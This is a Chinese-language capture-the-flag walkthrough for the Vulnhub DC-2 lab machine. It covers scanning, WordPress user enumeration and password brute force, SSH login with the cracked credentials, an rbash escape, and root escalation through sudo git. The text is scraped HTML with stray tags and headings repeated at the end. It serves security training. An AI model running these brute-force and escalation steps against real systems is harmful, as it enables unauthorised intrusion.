Vulnhub靶机DC-2渗透测试详细教程<\/h1>

1. 靶机环境准备<\/h2>
使用以下命令探测目标主机IP地址:<\/p>
arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 10.1.2.0\/24
<\/span><\/span><\/code><\/pre>假设发现目标IP为10.1.2.154<\/code><\/p>
2.2 端口扫描<\/h3>
nmap -p- 10.1.2.154
<\/span><\/span><\/code><\/pre>典型扫描结果会显示:<\/p>

80端口(HTTP服务)<\/li>
7744端口(SSH服务，非标准端口)<\/li>
<\/ul>
2.3 服务探针<\/h3>
nmap -sV -p 80,7744 10.1.2.154
<\/span><\/span><\/code><\/pre>3. Web应用渗透<\/h2>
3.1 访问Web服务<\/h3>
打开浏览器访问http:\/\/10.1.2.154<\/code>，首页会显示flag1，内容为:<\/p>

你通常的词汇表可能不会起作用，所以，也许你只需要保持冷静(cewl)。密码越多越好，但有时候你就是赢不了所有密码。以一个登录查看下一个标志。如果找不到，请以另一个身份登录。<\/p>
<\/blockquote>
3.2 目录爆破<\/h3>
使用dirsearch工具扫描网站目录:<\/p>
dirsearch -u http:\/\/dc-2 -i 200<\/span>
<\/span><\/span><\/code><\/pre>3.3 WordPress识别<\/h3>
发现网站使用WordPress CMS，使用wpscan扫描:<\/p>
wpscan --url http:\/\/dc-2 -e u
<\/span><\/span><\/code><\/pre>扫描结果会显示三个用户:<\/p>

admin<\/li>
tom<\/li>
jerry<\/li>
<\/ul>
将用户名保存到user.txt<\/code>文件中。<\/p>
3.4 密码字典生成<\/h3>
根据flag1提示，使用cewl生成密码字典:<\/p>
cewl http:\/\/dc-2 -w passwd.txt
<\/span><\/span><\/code><\/pre>3.5 WordPress爆破<\/h3>
使用wpscan进行密码爆破:<\/p>
wpscan --url http:\/\/dc-2 -U user.txt -P passwd.txt
<\/span><\/span><\/code><\/pre>爆破结果:<\/p>

用户名: tom 密码: parturient<\/li>
用户名: jerry 密码: adipiscing<\/li>
<\/ul>
3.6 登录WordPress后台<\/h3>
使用获得的凭据登录WordPress后台，找到flag2:<\/p>

如果您无法利用 WordPress 并走捷径，还有另一种方法。希望你找到了另一个切入点。<\/p>
<\/blockquote>
4. SSH远程登录<\/h2>
4.1 尝试SSH登录<\/h3>
ssh tom@10.1.2.154 -p 7744<\/span>
<\/span><\/span># 密码: parturient<\/span>
<\/span><\/span>
<\/span><\/span>ssh jerry@10.1.2.154 -p 7744<\/span>
<\/span><\/span># 密码: adipiscing<\/span>
<\/span><\/span><\/code><\/pre>发现tom可以成功登录，jerry无法直接登录。<\/p>
4.2 获取flag3<\/h3>
登录tom账户后，在家目录发现flag3.txt:<\/p>

可怜的老汤姆总是追着杰瑞跑。也许他应该为自己造成的压力承担责任。(su命令提示)<\/p>
<\/blockquote>
5. 受限shell(rbash)逃逸<\/h2>
5.1 检查当前shell环境<\/h3>
echo $SHELL
<\/span><\/span># 显示为rbash(受限bash)<\/span>
<\/span><\/span><\/code><\/pre>5.2 rbash逃逸方法<\/h3>
BASH_CMDS[<\/span>su]=<\/span>\/bin\/sh
<\/span><\/span>export PATH=<\/span>$PATH:\/bin\/
<\/span><\/span>export PATH=<\/span>$PATH:\/usr\/bin\/
<\/span><\/span>su jerry
<\/span><\/span># 输入jerry的密码: adipiscing<\/span>
<\/span><\/span><\/code><\/pre>成功切换到jerry用户。<\/p>
5.3 获取flag4<\/h3>
在jerry的家目录找到flag4.txt:<\/p>

很高兴看到你已经走了这么远-但你还没回家。你仍然需要得到最后的旗帜(唯一真正重要的旗帜!!!)这里没有提示-你现在是在你自己。:-)走吧-离开这里!!!!(git)<\/p>
<\/blockquote>
6. 权限提升<\/h2>
6.1 检查sudo权限<\/h3>
sudo -l
<\/span><\/span><\/code><\/pre>发现jerry用户可以以root权限执行git命令。<\/p>
6.2 利用git提权<\/h3>
sudo git branch --help config
<\/span><\/span>!\/bin\/sh
<\/span><\/span><\/code><\/pre>成功获取root权限。<\/p>
6.3 获取最终flag<\/h3>
在root目录下找到最终的flag文件。<\/p>
7. 总结<\/h2>
整个渗透测试过程涉及以下关键技术和工具:<\/p>

主机发现: arp-scan, nmap<\/li>
端口扫描和服务识别: nmap<\/li>
Web目录爆破: dirsearch<\/li>
WordPress扫描: wpscan<\/li>
密码字典生成: cewl<\/li>
受限shell逃逸技术<\/li>
sudo提权: git提权<\/li>
<\/ol>
通过这个靶机，我们学习了从信息收集到最终提权的完整渗透测试流程，特别是WordPress系统的常见攻击方法和受限环境下的逃逸技术。<\/p>
Vulnhub靶机DC-2渗透测试详细教程<\/h1>

2. 信息收集阶段<\/h2>

3. Web应用渗透<\/h2>

4. SSH远程登录<\/h2>

5. 受限shell(rbash)逃逸<\/h2>

6. 权限提升<\/h2>

6.3 获取最终flag<\/h3> 在root目录下找到最终的flag文件。<\/p>

6.3 获取最终flag<\/h3>
在root目录下找到最终的flag文件。<\/p>
